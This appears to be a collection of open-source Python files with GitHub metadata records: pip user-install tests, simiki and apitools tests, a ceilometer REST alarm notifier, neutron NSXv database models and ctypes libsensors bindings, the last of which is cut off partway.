"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "149656"
},
{
"name": "JavaScript",
"bytes": "361114"
},
{
"name": "Python",
"bytes": "1897887"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
}
|
"""
tests specific to "pip install --user"
"""
import imp
import os
import textwrap
import pytest
from os.path import curdir, isdir, isfile
from pip.compat import uses_pycache
from tests.lib.local_repos import local_checkout
from tests.lib import pyversion
def _patch_dist_in_site_packages(script):
sitecustomize_path = script.lib_path.join("sitecustomize.py")
sitecustomize_path.write(textwrap.dedent("""
def dist_in_site_packages(dist):
return False
from pip.req import req_install
req_install.dist_in_site_packages = dist_in_site_packages
"""))
# We once caught py32 using an outdated __pycache__ file after a
# sitecustomize update (even though Python should have refreshed it),
# so delete the cache file to be sure.
# See: https://github.com/pypa/pip/pull/893#issuecomment-16426701
if uses_pycache:
cache_path = imp.cache_from_source(sitecustomize_path)
if os.path.isfile(cache_path):
os.remove(cache_path)
class Tests_UserSite:
@pytest.mark.network
def test_reset_env_system_site_packages_usersite(self, script, virtualenv):
"""
reset_env(system_site_packages=True) produces env where a --user
install can be found using pkg_resources
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.2')
result = script.run(
'python', '-c',
"import pkg_resources; print(pkg_resources.get_distribution"
"('initools').project_name)",
)
project_name = result.stdout.strip()
# assert the comparison itself; asserting a (value, message) tuple is
# always truthy and would never fail
assert 'INITools' == project_name, (
"'%s' should be 'INITools'" % project_name)
@pytest.mark.network
def test_install_subversion_usersite_editable_with_distribute(
self, script, virtualenv, tmpdir):
"""
Test installing current directory ('.') into usersite after installing
distribute
"""
virtualenv.system_site_packages = True
result = script.pip(
'install', '--user', '-e',
'%s#egg=initools-dev' %
local_checkout(
'svn+http://svn.colorstudy.com/INITools/trunk',
tmpdir.join("cache"),
)
)
result.assert_installed('INITools', use_user_site=True)
def test_install_curdir_usersite(self, script, virtualenv, data):
"""
Test installing current directory ('.') into usersite
"""
virtualenv.system_site_packages = True
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '-vvv', '--user', curdir,
cwd=run_from,
expect_error=False,
)
fspkg_folder = script.user_site / 'fspkg'
egg_info_folder = (
script.user_site / 'FSPkg-0.1.dev0-py%s.egg-info' % pyversion
)
assert fspkg_folder in result.files_created, result.stdout
assert egg_info_folder in result.files_created
def test_install_user_venv_nositepkgs_fails(self, script, data):
"""
user install in virtualenv (with no system packages) fails with message
"""
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '--user', curdir,
cwd=run_from,
expect_error=True,
)
assert (
"Can not perform a '--user' install. User site-packages are not "
"visible in this virtualenv." in result.stderr
)
@pytest.mark.network
def test_install_user_conflict_in_usersite(self, script, virtualenv):
"""
Test user install with conflict in usersite updates usersite.
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.3')
result2 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_v3_file = (
# file only in 0.3
script.base_path / script.user_site / 'initools' /
'configparser.py'
)
assert egg_info_folder in result2.files_created, str(result2)
assert not isfile(initools_v3_file), initools_v3_file
@pytest.mark.network
def test_install_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
#    the virtualenv site; if we don't patch this, pip will return an
#    installation error: "Will not install to the usersite because it
#    will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite has sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
result2 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder)
assert isdir(initools_folder)
@pytest.mark.network
def test_upgrade_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install/upgrade with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
#    the virtualenv site; if we don't patch this, pip will return an
#    installation error: "Will not install to the usersite because it
#    will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite has sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
result2 = script.pip('install', '--user', '--upgrade', 'INITools')
# usersite has 0.3.1
egg_info_folder = (
script.user_site / 'INITools-0.3.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder), result2.stdout
assert isdir(initools_folder)
@pytest.mark.network
def test_install_user_conflict_in_globalsite_and_usersite(
self, script, virtualenv):
"""
Test user install with conflict in globalsite and usersite ignores
global site and updates usersite.
"""
# the test framework only supports testing using virtualenvs.
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site.
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
#    the virtualenv site; if we don't patch this, pip will return an
#    installation error: "Will not install to the usersite because it
#    will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite has sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
script.pip('install', '--user', 'INITools==0.3')
result3 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_v3_file = (
# file only in 0.3
script.base_path / script.user_site / 'initools' /
'configparser.py'
)
assert egg_info_folder in result3.files_created, str(result3)
assert not isfile(initools_v3_file), initools_v3_file
# site still has 0.2 (can't just look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder)
assert isdir(initools_folder)
@pytest.mark.network
def test_install_user_in_global_virtualenv_with_conflict_fails(
self, script, virtualenv):
"""
Test user install in --system-site-packages virtualenv with conflict in
site fails.
"""
virtualenv.system_site_packages = True
script.pip('install', 'INITools==0.2')
result2 = script.pip(
'install', '--user', 'INITools==0.1',
expect_error=True,
)
resultp = script.run(
'python', '-c',
"import pkg_resources; print(pkg_resources.get_distribution"
"('initools').location)",
)
dist_location = resultp.stdout.strip()
assert (
"Will not install to the user site because it will lack sys.path "
"precedence to %s in %s" %
('INITools', dist_location) in result2.stderr
)
|
{
"content_hash": "ab61e573e66b1ff148ffb718a5880724",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 79,
"avg_line_length": 38.62328767123287,
"alnum_prop": 0.6079978719631141,
"repo_name": "davidovich/pip",
"id": "049c7c8ee1fca9f0ffe31aff283def7ba5bd311e",
"size": "11278",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "tests/functional/test_install_user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1835"
},
{
"name": "Python",
"bytes": "2223088"
},
{
"name": "Shell",
"bytes": "1905"
}
],
"symlink_target": ""
}
|
import os
import os.path
import unittest
import shutil
from simiki.config import get_default_config
from simiki.initiator import Initiator
class TestInitiator(unittest.TestCase):
def setUp(self):
BASE_DIR = os.path.join(os.path.dirname(__file__), '..')
self.default_config = get_default_config()
self.config_file = os.path.join(BASE_DIR, "simiki", "conf_templates",
"_config.yml.in")
self.target_path = os.path.join(BASE_DIR, "tests", "_build")
if os.path.exists(self.target_path):
shutil.rmtree(self.target_path)
self.files = [
"_config.yml",
"fabfile.py",
os.path.join(self.default_config['source'], "intro",
"gettingstarted.md"),
]
self.dirs = [
self.default_config['source'],
self.default_config['destination'],
self.default_config['themes_dir'],
os.path.join(self.default_config['themes_dir'],
self.default_config['theme']),
]
def test_target_exist(self):
""" test Initiator target path exist
"""
i = Initiator(self.config_file, self.target_path)
i.init(ask=False)
for f in self.files:
self.assertTrue(os.path.isfile(os.path.join(self.target_path, f)))
for d in self.dirs:
self.assertTrue(os.path.isdir(os.path.join(self.target_path, d)))
def test_target_invalid(self):
""" test Initiator target path invalid, raise OSError
"""
target_error = "/foo/bar/why/not"
i = Initiator(self.config_file, target_error)
self.assertRaises(OSError, lambda: i.init())
def tearDown(self):
if os.path.exists(self.target_path):
shutil.rmtree(self.target_path)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "d3bbadd7291037b36a0a9faad03d0d8d",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 78,
"avg_line_length": 31.360655737704917,
"alnum_prop": 0.5703084161003659,
"repo_name": "tankywoo/simiki",
"id": "f028e7d0c745b6794ae7b7d81fc2728ea358a6ad",
"size": "1960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_initiator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "27002"
},
{
"name": "Dockerfile",
"bytes": "161"
},
{
"name": "HTML",
"bytes": "11438"
},
{
"name": "Makefile",
"bytes": "904"
},
{
"name": "Python",
"bytes": "100696"
},
{
"name": "Shell",
"bytes": "1138"
}
],
"symlink_target": ""
}
|
"""Rest alarm notifier."""
import eventlet
from oslo.config import cfg
from oslo.serialization import jsonutils
import requests
import six.moves.urllib.parse as urlparse
from ceilometer.alarm import notifier
from ceilometer.openstack.common import context
from ceilometer.openstack.common.gettextutils import _
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
OPTS = [
cfg.StrOpt('rest_notifier_certificate_file',
default='',
help='SSL Client certificate for REST notifier.'
),
cfg.StrOpt('rest_notifier_certificate_key',
default='',
help='SSL Client private key for REST notifier.'
),
cfg.BoolOpt('rest_notifier_ssl_verify',
default=True,
help='Whether to verify the SSL Server certificate when '
'calling alarm action.'
),
cfg.IntOpt('rest_notifier_max_retries',
default=0,
help='Number of retries for REST notifier',
),
]
cfg.CONF.register_opts(OPTS, group="alarm")
class RestAlarmNotifier(notifier.AlarmNotifier):
"""Rest alarm notifier."""
@staticmethod
def notify(action, alarm_id, previous, current, reason, reason_data,
headers=None):
headers = headers or {}
if not headers.get('x-openstack-request-id'):
headers['x-openstack-request-id'] = context.generate_request_id()
LOG.info(_(
"Notifying alarm %(alarm_id)s from %(previous)s "
"to %(current)s with action %(action)s because "
"%(reason)s. request-id: %(request_id)s") %
({'alarm_id': alarm_id, 'previous': previous,
'current': current, 'action': action,
'reason': reason,
'request_id': headers['x-openstack-request-id']}))
body = {'alarm_id': alarm_id, 'previous': previous,
'current': current, 'reason': reason,
'reason_data': reason_data}
headers['content-type'] = 'application/json'
kwargs = {'data': jsonutils.dumps(body),
'headers': headers}
if action.scheme == 'https':
default_verify = int(cfg.CONF.alarm.rest_notifier_ssl_verify)
options = urlparse.parse_qs(action.query)
verify = bool(int(options.get('ceilometer-alarm-ssl-verify',
[default_verify])[-1]))
kwargs['verify'] = verify
cert = cfg.CONF.alarm.rest_notifier_certificate_file
key = cfg.CONF.alarm.rest_notifier_certificate_key
if cert:
kwargs['cert'] = (cert, key) if key else cert
# FIXME(rhonjo): Retries are automatically done by urllib3 in requests
# library. However, there's no interval between retries in urllib3
# implementation. It will be better to put some interval between
# retries (future work).
max_retries = cfg.CONF.alarm.rest_notifier_max_retries
session = requests.Session()
session.mount(action.geturl(),
requests.adapters.HTTPAdapter(max_retries=max_retries))
eventlet.spawn_n(session.post, action.geturl(), **kwargs)
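# Example: an alarm action URL of
#   https://hooks.example.com/alarm?ceilometer-alarm-ssl-verify=0
# overrides rest_notifier_ssl_verify and disables certificate
# verification for that single webhook (parse_qs keeps the last value).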
|
{
"content_hash": "cb5108bafb23bf39e73e062efdb28129",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 78,
"avg_line_length": 38.67058823529412,
"alnum_prop": 0.5935503498630971,
"repo_name": "m1093782566/openstack_org_ceilometer",
"id": "e99022638ce336b8c1eb765076c197e1f28c368f",
"size": "3924",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "ceilometer/alarm/notifier/rest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2657375"
},
{
"name": "Shell",
"bytes": "3204"
}
],
"symlink_target": ""
}
|
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.db import l3_db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.plugins.vmware.common import nsxv_constants
class NsxvRouterBinding(model_base.BASEV2, models_v2.HasStatusDescription):
"""Represents the mapping between neutron router and vShield Edge."""
__tablename__ = 'nsxv_router_bindings'
# no ForeignKey to routers.id because for now, a router can be removed
# from routers when delete_router is executed, but the binding is only
# removed after the Edge is deleted
router_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(36),
nullable=True)
lswitch_id = sa.Column(sa.String(36),
nullable=True)
appliance_size = sa.Column(sa.Enum(
nsxv_constants.COMPACT,
nsxv_constants.LARGE,
nsxv_constants.XLARGE,
nsxv_constants.QUADLARGE,
name='nsxv_router_bindings_appliance_size'))
edge_type = sa.Column(sa.Enum(nsxv_constants.SERVICE_EDGE,
nsxv_constants.VDR_EDGE,
name='nsxv_router_bindings_edge_type'))
class NsxvEdgeVnicBinding(model_base.BASEV2):
"""Represents mapping between vShield Edge vnic and neutron netowrk."""
__tablename__ = 'nsxv_edge_vnic_bindings'
edge_id = sa.Column(sa.String(36),
primary_key=True)
vnic_index = sa.Column(sa.Integer(),
primary_key=True)
tunnel_index = sa.Column(sa.Integer(),
primary_key=True)
network_id = sa.Column(sa.String(36), nullable=True)
class NsxvEdgeDhcpStaticBinding(model_base.BASEV2):
"""Represents mapping between mac addr and bindingId."""
__tablename__ = 'nsxv_edge_dhcp_static_bindings'
edge_id = sa.Column(sa.String(36), primary_key=True)
mac_address = sa.Column(sa.String(32), primary_key=True)
binding_id = sa.Column(sa.String(36), nullable=False)
class NsxvInternalNetworks(model_base.BASEV2):
"""Represents internal networks between NSXV plugin elements."""
__tablename__ = 'nsxv_internal_networks'
network_purpose = sa.Column(
sa.Enum(nsxv_constants.INTER_EDGE_PURPOSE,
name='nsxv_internal_networks_purpose'),
primary_key=True)
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete="CASCADE"),
nullable=False)
class NsxvInternalEdges(model_base.BASEV2):
"""Represents internal Edge appliances for NSXV plugin operations."""
__tablename__ = 'nsxv_internal_edges'
ext_ip_address = sa.Column(sa.String(64), primary_key=True)
router_id = sa.Column(sa.String(36), nullable=False)
purpose = sa.Column(
sa.Enum(nsxv_constants.INTER_EDGE_PURPOSE,
name='nsxv_internal_edges_purpose'))
class NsxvSecurityGroupSectionMapping(model_base.BASEV2):
"""Backend mappings for Neutron Rule Sections.
This class maps a neutron security group identifier to the corresponding
NSX layer 3 section.
"""
__tablename__ = 'nsxv_security_group_section_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygroups.id',
ondelete="CASCADE"),
primary_key=True)
ip_section_id = sa.Column(sa.String(100))
class NsxvRuleMapping(model_base.BASEV2):
"""Backend mappings for Neutron Rule Sections.
This class maps a neutron security group identifier to the corresponding
NSX layer 3 and layer 2 sections.
"""
__tablename__ = 'nsxv_rule_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygrouprules.id',
ondelete="CASCADE"),
primary_key=True)
nsx_rule_id = sa.Column(sa.String(36), primary_key=True)
class NsxvPortVnicMapping(model_base.BASEV2):
"""Maps neutron port to NSXv VM Vnic Id."""
__tablename__ = 'nsxv_port_vnic_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nsx_id = sa.Column(sa.String(42), primary_key=True)
class NsxvRouterExtAttributes(model_base.BASEV2):
"""Router attributes managed by NSX plugin extensions."""
__tablename__ = 'nsxv_router_ext_attributes'
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
distributed = sa.Column(sa.Boolean, default=False, nullable=False)
exclusive = sa.Column(sa.Boolean, default=False, nullable=False)
service_router = sa.Column(sa.Boolean, default=False, nullable=False)
# Add a relationship to the Router model in order to instruct
# SQLAlchemy to eagerly load this association
router = orm.relationship(
l3_db.Router,
backref=orm.backref("nsx_attributes", lazy='joined',
uselist=False, cascade='delete'))
class NsxvTzNetworkBinding(model_base.BASEV2):
"""Represents a binding of a virtual network with a transport zone.
This model class associates a Neutron network with a transport zone;
optionally a vlan ID might be used if the binding type is 'vlan'
"""
__tablename__ = 'nsxv_tz_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
binding_type = sa.Column(
sa.Enum('flat', 'vlan', 'portgroup',
name='nsxv_tz_network_bindings_binding_type'),
nullable=False, primary_key=True)
phy_uuid = sa.Column(sa.String(36), primary_key=True, nullable=True)
vlan_id = sa.Column(sa.Integer, primary_key=True, nullable=True,
autoincrement=False)
def __init__(self, network_id, binding_type, phy_uuid, vlan_id):
self.network_id = network_id
self.binding_type = binding_type
self.phy_uuid = phy_uuid
self.vlan_id = vlan_id
def __repr__(self):
return "<NsxvTzNetworkBinding(%s,%s,%s,%s)>" % (self.network_id,
self.binding_type,
self.phy_uuid,
self.vlan_id)
class NsxvPortIndexMapping(model_base.BASEV2):
"""Associates attached Neutron ports with the instance VNic index."""
__tablename__ = 'nsxv_port_index_mappings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
device_id = sa.Column(sa.String(255), nullable=False)
index = sa.Column(sa.Integer, nullable=False)
__table_args__ = (sa.UniqueConstraint(device_id, index),)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly read port vnic-index
port = orm.relationship(
models_v2.Port,
backref=orm.backref("vnic_index", lazy='joined',
uselist=False, cascade='delete'))
class NsxvEdgeFirewallRuleBinding(model_base.BASEV2):
"""Mapping between firewall rule and edge firewall rule_id."""
__tablename__ = 'nsxv_firewall_rule_bindings'
rule_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
rule_vse_id = sa.Column(sa.String(36))
class NsxvSpoofGuardPolicyNetworkMapping(model_base.BASEV2):
"""Mapping between SpoofGuard and neutron networks"""
__tablename__ = 'nsxv_spoofguard_policy_network_mappings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'),
primary_key=True,
nullable=False)
policy_id = sa.Column(sa.String(36), nullable=False)
|
{
"content_hash": "145309f03d8f6aa84960f309ff8341ed",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 77,
"avg_line_length": 37.57077625570776,
"alnum_prop": 0.6109625668449198,
"repo_name": "blueboxgroup/neutron",
"id": "395238db0673b23509fa8f65f5782976cac98a37",
"size": "8859",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/plugins/vmware/dbexts/nsxv_models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21914"
},
{
"name": "JavaScript",
"bytes": "60527"
},
{
"name": "Makefile",
"bytes": "3295"
},
{
"name": "Python",
"bytes": "8670612"
},
{
"name": "Shell",
"bytes": "63149"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
"""Test for gen_client module."""
import os
import unittest2
from apitools.gen import gen_client
from apitools.gen import test_utils
def GetDocPath(name):
return os.path.join(os.path.dirname(__file__), 'testdata', name)
@test_utils.RunOnlyOnPython27
class ClientGenCliTest(unittest2.TestCase):
def testHelp_NotEnoughArguments(self):
with self.assertRaisesRegexp(SystemExit, '0'):
with test_utils.CaptureOutput() as (_, err):
gen_client.main([gen_client.__file__, '-h'])
err_output = err.getvalue()
self.assertIn('usage:', err_output)
self.assertIn('error: too few arguments', err_output)
def testGenClient_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenClient_SimpleDocWithV4(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--apitools_version', '0.4.12',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenClient_SimpleDocWithV5(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--apitools_version', '0.5.0',
'--root_package', 'google.apis',
'client'
])
self.assertEquals(
set(['dns_v1_client.py', 'dns_v1_messages.py', '__init__.py']),
set(os.listdir(tmp_dir_path)))
def testGenPipPackage_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'pip_package'
])
self.assertEquals(
set(['apitools', 'setup.py']),
set(os.listdir(tmp_dir_path)))
def testGenProto_SimpleDoc(self):
with test_utils.TempDir() as tmp_dir_path:
gen_client.main([
gen_client.__file__,
'--nogenerate_cli',
'--infile', GetDocPath('dns_v1.json'),
'--outdir', tmp_dir_path,
'--overwrite',
'--root_package', 'google.apis',
'proto'
])
self.assertEquals(
set(['dns_v1_messages.proto', 'dns_v1_services.proto']),
set(os.listdir(tmp_dir_path)))
|
{
"content_hash": "7e0e3378d0fbb5902118a9dd101b0f7b",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 79,
"avg_line_length": 35.71287128712871,
"alnum_prop": 0.4835042971998891,
"repo_name": "catapult-project/catapult-csm",
"id": "25e9e23506eaa6443d64348739ea84241e7b429f",
"size": "4185",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "third_party/google-endpoints/apitools/gen/gen_client_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4902"
},
{
"name": "C++",
"bytes": "43728"
},
{
"name": "CSS",
"bytes": "24873"
},
{
"name": "Go",
"bytes": "80325"
},
{
"name": "HTML",
"bytes": "11817766"
},
{
"name": "JavaScript",
"bytes": "518002"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "Python",
"bytes": "6207634"
},
{
"name": "Shell",
"bytes": "2558"
}
],
"symlink_target": ""
}
|
import click
def create_provider_command(group):
@group.command()
@click.argument("hosts", nargs=-1)
def hosts(hosts):
return hosts
|
{
"content_hash": "8f2274baf3394beb547e6c513b978255",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 38,
"avg_line_length": 19.25,
"alnum_prop": 0.6493506493506493,
"repo_name": "Trundle/harpoon",
"id": "6039be8ce9268a499ad52a696a5f5efedd51b3fa",
"size": "154",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "harpoon/hostlistproviders/hosts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13961"
}
],
"symlink_target": ""
}
|
import os
from ctypes import CDLL, c_char_p, c_int, c_void_p, c_uint, c_double, byref, Structure, get_errno,\
POINTER, c_short, c_size_t, create_string_buffer
from ctypes.util import find_library
from psistats.libsensors.lib import stdc
version_info = (0, 0, 3)
__version__ = '.'.join(map(str, version_info))
__date__ = '2014-08-17'
__author__ = "Marc 'BlackJack' Rintsch"
__contact__ = 'marc@rintsch.de'
__license__ = 'LGPL v2.1'
API_VERSION = 4
DEFAULT_CONFIG_FILENAME = '/etc/sensors3.conf'
LIB_FILENAME = os.environ.get('SENSORS_LIB') or find_library('sensors')
SENSORS_LIB = CDLL(LIB_FILENAME)
VERSION = c_char_p.in_dll(SENSORS_LIB, 'libsensors_version').value
MAJOR_VERSION = version_info[0]
class SensorsError(Exception):
def __init__(self, message, error_number=None):
Exception.__init__(self, message)
self.error_number = error_number
def _error_check(result, _func, _arguments):
if result < 0:
raise SensorsError(_strerror(result), result)
return result
_strerror = SENSORS_LIB.sensors_strerror
_strerror.argtypes = [c_int]
_strerror.restype = c_char_p
_init = SENSORS_LIB.sensors_init
_init.argtypes = [c_void_p]
_init.restype = c_int
_init.errcheck = _error_check
cleanup = SENSORS_LIB.sensors_cleanup
cleanup.argtypes = None
cleanup.restype = None
SENSORS_FEATURE_IN = 0x00
SENSORS_FEATURE_FAN = 0x01
SENSORS_FEATURE_TEMP = 0x02
SENSORS_FEATURE_POWER = 0x03
SENSORS_FEATURE_ENERGY = 0x04
SENSORS_FEATURE_CURR = 0x05
SENSORS_FEATURE_HUMIDITY = 0x06
# SENSORS_FEATURE_MAX_MAIN
SENSORS_FEATURE_VID = 0x10
SENSORS_FEATURE_INTRUSION = 0x11
# SENSORS_FEATURE_MAX_OTHER,
SENSORS_FEATURE_BEEP_ENABLE = 0x18
# SENSORS_FEATURE_MAX,
# SENSORS_FEATURE_UNKNOWN = INT_MAX
def init(config_filename=DEFAULT_CONFIG_FILENAME):
file_p = stdc.fopen(config_filename.encode('utf-8'), b'r')
if file_p is None:
error_number = get_errno()
raise OSError(error_number, os.strerror(error_number), config_filename)
try:
_init(file_p)
finally:
stdc.fclose(file_p)
class Subfeature(Structure):
_fields_ = [
('name', c_char_p),
('number', c_int),
('type', c_int),
('mapping', c_int),
('flags', c_uint),
]
def __repr__(self):
return '<%s name=%r number=%d type=%d mapping=%d flags=%08x>' % (
self.__class__.__name__,
self.name,
self.number,
self.type,
self.mapping,
self.flags
)
def get_value(self):
result = c_double()
_get_value(byref(self.parent.chip), self.number, byref(result))
return result.value
SUBFEATURE_P = POINTER(Subfeature)
class Feature(Structure):
_fields_ = [
('name', c_char_p),
('number', c_int),
('type', c_int),
('_first_subfeature', c_int),
('_padding1', c_int),
]
def __repr__(self):
return '<%s name=%r number=%r type=%r>' % (
self.__class__.__name__,
self.name,
self.number,
self.type
)
def __iter__(self):
number = c_int(0)
while True:
result_p = _get_all_subfeatures(
byref(self.chip),
byref(self),
byref(number)
)
if not result_p:
break
result = result_p.contents
result.chip = self.chip
result.parent = self
yield result
@property
def label(self):
#
# TODO Maybe this is a memory leak!
#
return _get_label(byref(self.chip), byref(self)).decode('utf-8')
def get_value(self):
#
# TODO Is the first always the correct one for all feature types?
#
return next(iter(self)).get_value()
FEATURE_P = POINTER(Feature)
class Bus(Structure):
TYPE_ANY = -1
NR_ANY = -1
_fields_ = [
('type', c_short),
('nr', c_short),
]
def __str__(self):
return (
'*' if self.type == self.TYPE_ANY
else _get_adapter_name(byref(self)).decode('utf-8')
)
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.type, self.nr)
@property
def has_wildcards(self):
return self.type == self.TYPE_ANY or self.nr == self.NR_ANY
BUS_P = POINTER(Bus)
class Chip(Structure):
#
# TODO Move common stuff into `AbstractChip` class.
#
_fields_ = [
('prefix', c_char_p),
('bus', Bus),
('addr', c_int),
('path', c_char_p),
]
PREFIX_ANY = None
ADDR_ANY = -1
def __new__(cls, *args):
result = super(Chip, cls).__new__(cls)
if args:
_parse_chip_name(args[0].encode('utf-8'), byref(result))
return result
def __init__(self, *_args):
Structure.__init__(self)
#
# Need to bind the following to the instance so it is available in
# `__del__()` when the interpreter shuts down.
#
self._free_chip_name = _free_chip_name
self.byref = byref
def __del__(self):
if self._b_needsfree_:
self._free_chip_name(self.byref(self))
def __repr__(self):
return '<%s prefix=%r bus=%r addr=%r path=%r>' % (
(
self.__class__.__name__,
self.prefix,
self.bus,
self.addr,
self.path
)
)
def __str__(self):
buffer_size = 200
result = create_string_buffer(buffer_size)
used = _snprintf_chip_name(result, len(result), byref(self))
assert used < buffer_size
return result.value.decode('utf-8')
def __iter__(self):
number = c_int(0)
while True:
result_p = _get_features(byref(self), byref(number))
if not result_p:
break
result = result_p.contents
result.chip = self
yield result
@property
def adapter_name(self):
return str(self.bus)
@property
def has_wildcards(self):
return (
self.prefix == self.PREFIX_ANY
or self.addr == self.ADDR_ANY
or self.bus.has_wildcards
)
CHIP_P = POINTER(Chip)
_parse_chip_name = SENSORS_LIB.sensors_parse_chip_name
